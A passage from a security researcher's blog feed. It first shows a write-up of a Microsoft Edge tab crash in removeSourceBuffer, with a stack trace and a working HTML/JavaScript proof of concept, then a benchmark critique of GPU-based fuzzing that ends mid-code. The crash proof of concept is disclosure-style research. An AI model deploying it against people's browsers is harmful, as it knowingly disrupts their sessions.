00007ffa`35813e4a     Chakra!Js::JavascriptFunction::CallRootFunction+0x7c
00007ffa`35813d29     Chakra!ScriptSite::CallRootFunction+0x6a
00007ffa`35813acb     Chakra!ScriptSite::Execute+0x179
00007ffa`362bebed     Chakra!ScriptEngineBase::Execute+0x19b
00007ffa`362bde49     edgehtml!CListenerDispatch::InvokeVar+0x41d
00007ffa`362bc6c2     edgehtml!CEventMgr::_InvokeListeners+0xd79
00007ffa`35fdf8f1     edgehtml!CEventMgr::Dispatch+0x922
00007ffa`35fe0089     edgehtml!CEventMgr::DispatchPointerEvent+0x215
00007ffa`35fe04f4     edgehtml!CEventMgr::DispatchClickEvent+0x1d1
00007ffa`36080f10     edgehtml!Tree::ElementNode::Fire_onclick+0x60
00007ffa`36080ca0     edgehtml!Tree::ElementNode::DoClick+0xf0
[...]

Amusingly, the browser crashed in the CMediaElement::IsSafeToUse function. Apparently, the answer is no – it isn’t safe to use.

Crash reproduction

The stack trace indicates that the function that was executed by the JavaScript code, and eventually caused the crash, was removeSourceBuffer, part of the MediaSource Web API. Looking for a convenient example to play with, we stumbled upon this page which uses the counterpart function, addSourceBuffer. We added a button that calls removeSourceBuffer and tried it out.

Just calling removeSourceBuffer didn’t cause a crash (otherwise it would be too easy, right?). To see how far we got, we attached a debugger and put a breakpoint on the edgehtml!CMediaSourceExtension::Var_removeSourceBuffer function, then did some stepping. We saw that the CSourceBuffer::RemoveAllTracksHelper function was not being called at all. What tracks does it help to remove?

After some searching, we learned that there’s the HTML <track> element that allows us to specify textual data, such as subtitles, for a media element. We added such an element to our sample video and bingo! Edge crashed just as we hoped.

Crash reason

Our best guess is that the crash happens because the CTextTrackList::GetTrackCount function returns an incorrect value. In our case, it returns 2 instead of 1. An iteration is then made, and the CTextTrackList::GetTrackNoRef function is called with index values from 0 to the track count (simplified):

int count = CTextTrackList::GetTrackCount();
for (int i = 0; i < count; i++) {
    CTextTrackList::GetTrackNoRef(..., i);
    /* more code... */
}

While it may look like an out-of-bounds bug, it isn’t. GetTrackNoRef returns an error for an invalid index, and for index=1 (in our case), a valid object is returned, it’s just that one of its fields is a NULL pointer. Perhaps the last value in the array is some kind of a sentinel value which was not supposed to be part of the iteration.

Exploitation

The bug is not exploitable, and can only cause a slight inconvenience by crashing the browser tab.

POC

Here’s a POC that demonstrates the crash. Save it as an html file, and place the test.mp4, foo.vtt files in the same folder.

Tested versions:

  • Microsoft Edge 44.18362.449.0
  • Microsoft EdgeHTML 18.18363
<button>Crash</button>
<br><br><br>

<video autoplay controls playsinline>
    <!-- https://gist.github.com/Michael-ZecOps/046e2c97d208a0a6da2f81c3812f7d5d -->
    <track label="English" kind="subtitles" srclang="en" src="foo.vtt" default>
</video>

<script>
    // Based on: https://simpl.info/mse/
    var FILE = 'test.mp4'; // https://w3c-test.org/media-source/mp4/test.mp4
    var video = document.querySelector('video');

    var mediaSource = new MediaSource();
    video.src = window.URL.createObjectURL(mediaSource);

    mediaSource.addEventListener('sourceopen', function () {
        var sourceBuffer = mediaSource.addSourceBuffer('video/mp4; codecs="mp4a.40.2,avc1.4d400d"');

        var button = document.querySelector('button');
        button.onclick = () => mediaSource.removeSourceBuffer(mediaSource.sourceBuffers[0]);

        get(FILE, function (uInt8Array) {
            var file = new Blob([uInt8Array], {
                type: 'video/mp4'
            });

            var reader = new FileReader();

            reader.onload = function (e) {
                sourceBuffer.appendBuffer(new Uint8Array(e.target.result));
                sourceBuffer.addEventListener('updateend', function () {
                    if (!sourceBuffer.updating && mediaSource.readyState === 'open') {
                        mediaSource.endOfStream();
                    }
                });
            };

            reader.readAsArrayBuffer(file);
        });
    }, false);

    function get(url, callback) {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', url, true);
        xhr.responseType = 'arraybuffer';
        xhr.send();

        xhr.onload = function () {
            if (xhr.status !== 200) {
                alert('Unexpected status code ' + xhr.status + ' for ' + url);
                return false;
            }
            callback(new Uint8Array(xhr.response));
        };
    }
</script>


Some thoughts on ToB’s GPU-based fuzzing

23 October 2020 at 07:11

The blog

The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!

Let’s build a high-performance fuzzer with GPUs!

Summary

In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called remill, which is designed for binary translation. Remill alone is incredibly impressive.

The target they picked as a benchmark is the BPF packet filtering code in libpcap, bpf_filter_with_aux_data. This function is pretty simple: it executes a compiled BPF filter and uses it to extract information from and filter a packet.

The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handing virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!

I’m super excited about this blog, mainly because it’s very similar to the vectorized emulation I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this post goes into some criticisms, it’s important to note that the research is only just starting; there is much progress to be had! It’s also important to note that this research was done by Ryan in only 2 months. That is incredible progress.


The Problems

Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.

The comparison

In the blog, the comparison being presented is largely between the performance of libfuzzer and their GPU-based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second) per US dollar. This comparison is largely meant to emphasize the cost efficiency of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.

The hardware they’re testing on is 2 different Google Cloud Compute nodes with various specs. The one used to benchmark libfuzzer is an n1-standard-8: a 4-core, 8-hyperthread Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.

The other machine they’re testing on, for their GPU metrics, is an NVIDIA Tesla T4 single-GPU compute node from Google Cloud Platform. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking their costs into consideration.

In their blog, they mention that “This isn’t an entirely fair comparison.”, largely referring to the fact that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, while libfuzzer is relying on the function not having any persistent state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU-based fuzzer also works on binaries, where libfuzzer requires source, so once again, there are a lot of variables at play here. It is important to note that they’re mainly looking for order-of-magnitude estimates; but this is still a lot more than should be controlled for, in my opinion. Also important to note: the blog concludes with only a ~4x improvement over libfuzzer, which is well within the range these uncontrolled variables could account for.

Of course, if you’ve read my blogs before, you’ll know I absolutely hate comparisons between problems with multiple variables. First of all, the cost of mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which was picked is a single function which, at first glance, does very little processing, but we’ll look into this more later.

So, let’s start off by eliminating one variable right away: what is the cost of generating an input in libfuzzer, and what is the cost of the actual function under test? This will effectively tell us how “fair” the execution comparison is. The binary-vs-source question is subjective, and clearly the binary-based engine is more impressive.

How do we do this? Well, let’s first figure out how fast libfuzzer can execute a target that does literally nothing. This will give us a baseline for libfuzzer’s own overhead.

#include <stdlib.h>
#include <stdint.h>

extern int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
  return 0;  // Non-zero return values are reserved for future use.
}
clang-12 -fsanitize=fuzzer -O2 test.c

We’ll run this test on an Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz, turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally; thus, we’re talking about relative numbers and not absolutes.

They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.

pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules   (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1), 
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850), 
INFO: A corpus is not provided, starting from an empty corpus
#2      INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608        pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728      pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb

Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. Hmm, that seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.

Next, let’s see how expensive the target code is outside of libfuzzer.

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

fn main() {
    const ITERS: u64 = 100_000_000;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0u8; 1500];

        let time = Instant::now();
        for _ in 0..ITERS {
            // Filter a packet
            bpf_filter_with_aux_data(
                program.bf_insns,
                buf.as_ptr(),
                buf.len() as u32,
                buf.len() as u32,
                std::ptr::null()
            );
        }
        let elapsed = time.elapsed().as_secs_f64();

        print!("{:14.2} packets/second\n", ITERS as f64 / elapsed);
    }
}

We’re just going to compile the filter they mention in their blog, then call bpf_filter_with_aux_data in a loop, applying the filter, and finally print the number of iterations per second that we can do. In my specific case, I’m using libpcap-1.9.1 as distributed in a source code zip; this may differ slightly from their version.

pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
    Finished release [optimized] target(s) in 0.01s
     Running `target/release/harness`
   18703628.46 packets/second

Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, yet libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. In other words, libfuzzer is given about a 6x penalty compared to the GPU fuzzer, which immediately erases the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.

This, unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. That makes the comparison against libfuzzer pretty much invalid in my eyes.

Trying to make the comparison closer

I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. It’s important to note, from this point on, this comparison is for myself. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance. I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.

So, to start off, I’m going to compare the GPU fuzzer against my vectorized emulation. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.
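To illustrate the core idea (a minimal sketch using AVX-512 intrinsics, not my actual JIT output): each 512-bit register holds the same guest register for 8 VMs, so a single host instruction steps all 8 of them at once.

#include <immintrin.h>
#include <stdint.h>

/* Minimal illustration of vectorized emulation, not the actual JIT: each
 * AVX-512 lane holds one VM's copy of a guest register, so emulating one
 * 64-bit guest ADD for 8 VMs takes a single host instruction. */
void vectorized_add(uint64_t dst[8], const uint64_t a[8], const uint64_t b[8]) {
    __m512i va = _mm512_loadu_si512((const void *)a);  /* guest reg A, VMs 0..7 */
    __m512i vb = _mm512_loadu_si512((const void *)b);  /* guest reg B, VMs 0..7 */
    _mm512_storeu_si512((void *)dst, _mm512_add_epi64(va, vb));
}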

Vectorized emulation is entirely my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and lets me make rapid changes to internals when needed. But it also means my code generation should be significantly worse than something like LLVM’s, as I do only the most basic optimizations (DCE, deduplication, etc.). I don’t do any reordering, loop unrolling, memory access elision, etc.

Let’s try it!

The environment

To get as close as possible to ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there are no specifics about what they used as an input, so we’re making the assumption that using a 1500-byte zeroed-out input, simply invoking bpf_filter_with_aux_data, waiting for it to return, then resetting VM memory back to the original state and running again, is fair. Due to how many or-conditions are used in the filter, and given that the packet doesn’t match any of them, we should be seeing the worst-case performance (e.g. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination were 1.2.3.4, I’d suspect the performance would improve. Without this being clarified in the ToB blog, we’re just going with the worst case (unless I’m incorrect in my understanding of BPF filters; maybe there’s no early exit).

Anyways, the target code that I’m using is as such:

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

#[no_mangle]
pub extern fn fuzz_external() {
    const ITERS: u64 = 1;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0x41u8; 1500];

		// Filter a packet
		bpf_filter_with_aux_data(
			program.bf_insns,
			buf.as_ptr(),
			buf.len() as u32,
			buf.len() as u32,
			std::ptr::null()
		);
    }
}

fn main() {
    fuzz_external();
}

This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of bpf_filter_with_aux_data, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.

Further, I will add another breakpoint on the return site of bpf_filter_with_aux_data to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing buf) and otherwise bubbling up to an exit() syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only bpf_filter_with_aux_data is executed, and once it returns, the VM is reset and run again.
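The shape of that loop, in pseudocode (the function names here are illustrative, not my emulator’s actual API):

/* Pseudocode for the snapshot-fuzz loop; run_until_breakpoint(),
 * snapshot_take() and vm_reset() are illustrative names, not a real API. */
run_until_breakpoint(vm, sym("bpf_filter_with_aux_data")); /* reach the target */
struct snapshot *snap = snapshot_take(vm); /* capture registers + memory       */

for (;;) {
    vm_reset(vm, snap);                    /* restore only the dirtied state   */
    run_until_breakpoint(vm, return_site); /* execute just the function body   */
    record_coverage(vm);                   /* one fuzz case done               */
}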

My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc.), different levels of memory protection (e.g. byte-level permissions, which give every single byte its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).
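As a rough sketch of how byte-level permissions with uninitialized-memory tracking can work (an illustration of the scheme, not my emulator’s actual code):

#include <stdint.h>
#include <stddef.h>

/* Illustration of byte-level permissions, not the emulator's actual code:
 * every guest byte has a shadow byte of permission bits. The RAW bit
 * ("read-after-write") implements uninitialized-memory tracking: a byte
 * only becomes readable once it has been written. */
#define PERM_READ  (1 << 0)
#define PERM_WRITE (1 << 1)
#define PERM_RAW   (1 << 2)

static int guest_write(uint8_t *mem, uint8_t *perms, size_t addr, uint8_t val) {
    if (!(perms[addr] & PERM_WRITE)) return 0;             /* fault: not writable */
    if (perms[addr] & PERM_RAW) perms[addr] |= PERM_READ;  /* now initialized     */
    mem[addr] = val;
    return 1;
}

static int guest_read(const uint8_t *mem, const uint8_t *perms,
                      size_t addr, uint8_t *out) {
    if (!(perms[addr] & PERM_READ)) return 0;  /* fault: unmapped or uninitialized */
    *out = mem[addr];
    return 1;
}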

Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60-core c2-standard-60 (30 Cascade Lake Intel cores, totaling 60 hyper-threads) machine from Google Cloud Platform to get as close to apples-to-apples as I can. This machine costs $3.1321/hour, and thus we’ll have to divide by these costs to make the dollar-based comparisons fair.

Here… we… go!

[Figure: fuzz cases per second per core vs. number of cores, one line per instrumentation configuration]

Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.

We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! It lines up exactly with what we want: the emulator scales linearly as cores are added, until we get past 30 cores, where the additional “cores” are hyperthreads rather than physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!

Anyways, we have multiple lines here. The top line, to no surprise, gathers no coverage information, doesn’t track taint, and doesn’t check permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, nor would I expect it to be. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped-out code being jumped over.

Next, we have the light blue line, which at this stage is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at the byte level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This, of course, has a performance cost. And this is the real line: there’s no way I’d ever run a fuzzer without permission checks, as the target would simply crash the host. I could use a more relaxed permission-checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)) and I’d match the green line in performance, but it’s not worth it. Byte level is too important to me.

Finally, we have the orange line. This one adds register “taint” tracking. This effectively looks horizontally at neighboring VMs during execution to determine whether one VM has written or read a different value to a register. This allows me to observe and feed back information about which register values are influenced by the user input, which is important for cutting down on mutation waste. That being said, we’re not mutating here, so it doesn’t really matter; we’re just looking at the runtime cost of this instrumentation.

Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core c2-standard-60 machine.

Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about 79.8 million iters/second/dollar/hour.

I don’t have access to their GPU code so I can’t reproduce it, but the number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.
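As a quick sanity check of that arithmetic (nothing here but the numbers quoted above):

vecemu_rate = 250_000_000 / 3.1321  # ~79.8M iters/sec per dollar-hour (c2-standard-60)
gpu_rate    = 8_400_000 / 0.35      # ~24.0M iters/sec per dollar-hour (Tesla T4)
print(vecemu_rate / gpu_rate)       # ~3.3x in favor of vectorized emulation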

This gives vectorized emulation about a 3x advantage in performance per dollar compared to the GPU-based compute. It’s important to note that both technologies may still have some pretty large performance improvements possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.

Where does this leave us?

I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.

GPUs have some major memory limitations that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all memory modified by a fuzz case must fit in under 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero CVE-2020-15999, and I’m pushing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur, and re-claiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target; I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.

Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reducing the number of threads. There are definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).

Is there more perf?

It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down; this makes my memory accesses really expensive. I am happy to see, though, that vectorized emulation looks to be within about ~3x of native execution (18M packets/second in the native libpcap harness mentioned early on, 5.5M with vectorized emulation). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?

Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.

Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement over the GPU fuzzing in cost effectiveness, and there’s a 3x speedup from my emulation to just running it natively on x86, then there’s a 9x improvement from GPU execution to just running it natively.

This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target against libfuzzer performing orchestration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot-based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc., you lose a lot of performance (when running at these speeds). For example, in the vectorized emulation runs for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.

But wait… what even are these dollar amounts?

So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers easier than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.

But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.

The GPU they are using is an NVIDIA Tesla T4, which costs $0.35/hour on Google Cloud Platform. The CPU they are using (for libfuzzer) is a quad-core Skylake, which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad-core Skylake is $150. What the?

Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.

But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.

For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and the price I paid) for these processors is $1,788 each; thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But we’ll simplify it a bit; we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.

For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Let’s just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k just for the 4 CPUs + $2k in chassis and motherboards, and thus that leaves us with $8k budget for GPUs. Let’s just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs’ RAM and call it “even”.

Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.

Well, how does it stack up?

I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking); this is a common mode for when I’m not fuzzing too deep on a target. Well, let’s light up those cores.

[Screenshot: all 192 hardware threads saturated while running vectorized emulation]

Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.

Well, we’re getting about 700 million fuzz cases per second on the whole system. Woo! That’s a shitton! That is 77k iters/second/$. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one-time dollar investment, not a per-hour cloud fee.

So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.

What gives? Well, the CPUs will definitely use more power; at 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, including peripherals and others. The Tesla T4 is 70W each, totalling 280W. This would likely be in a system which would take about 200W to run the CPU, chassis, RAM, etc., so let’s say 500W. Well, it’d be about half the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major. For me, I pay $0.10/kWh; thus, doubling for cooling, the CPU server would cost about $0.20 per hour and the GPU build about $0.10 per hour. These are my “cloud compute” runtime costs, and at those rates the GPUs are still about 10x more expensive per iteration than the CPU solution.

Conclusion

As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.

There’s a pretty large discrepancy in the cost effectiveness of GPUs in the cloud, and the blog ends up getting a pretty large advantage over libfuzzer from something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blog’s tests (a quad-core Skylake @ $200 or so vs an NVIDIA T4 @ $2,000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!

Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.

But! The GPU solution (as well as vectorized emulation) allows for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown than not be able to fuzz it at all (e.g. because I’d need source)!

Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.

I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!


Random opinions

I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.

Is not having syscalls a problem?

No. It’s not. It is for people who want to use the tool, but this is a research tool for exploring what is possible; the act of fuzzing on a GPU by running binary-translated code is incredible, and that’s the focus here! GPUs are Turing complete, so we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.

There’s also nothing preventing GPUs from being used to emulate a whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with software TLBs these things can be made manageable enough that it’s still worth doing!
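To make the software TLB idea concrete, here is a minimal sketch of a direct-mapped software TLB (the sizes, types, and page_walk slow path are all illustrative assumptions, not anyone’s real implementation; the all-zero initial state is ignored for brevity):

#include <stdint.h>

#define TLB_ENTRIES 1024
#define PAGE_SHIFT  12

typedef struct { uint64_t vpage; uint64_t host_base; } tlb_entry_t;
static tlb_entry_t tlb[TLB_ENTRIES];

/* Hypothetical slow path: a full page table walk for a guest virtual page. */
extern uint64_t page_walk(uint64_t vpage);

uint64_t translate(uint64_t vaddr)
{
    uint64_t vpage = vaddr >> PAGE_SHIFT;
    tlb_entry_t *e = &tlb[vpage % TLB_ENTRIES];
    if (e->vpage != vpage) {            /* miss: pay for the walk once */
        e->vpage = vpage;
        e->host_base = page_walk(vpage);
    }
    return e->host_base + (vaddr & ((1ULL << PAGE_SHIFT) - 1));
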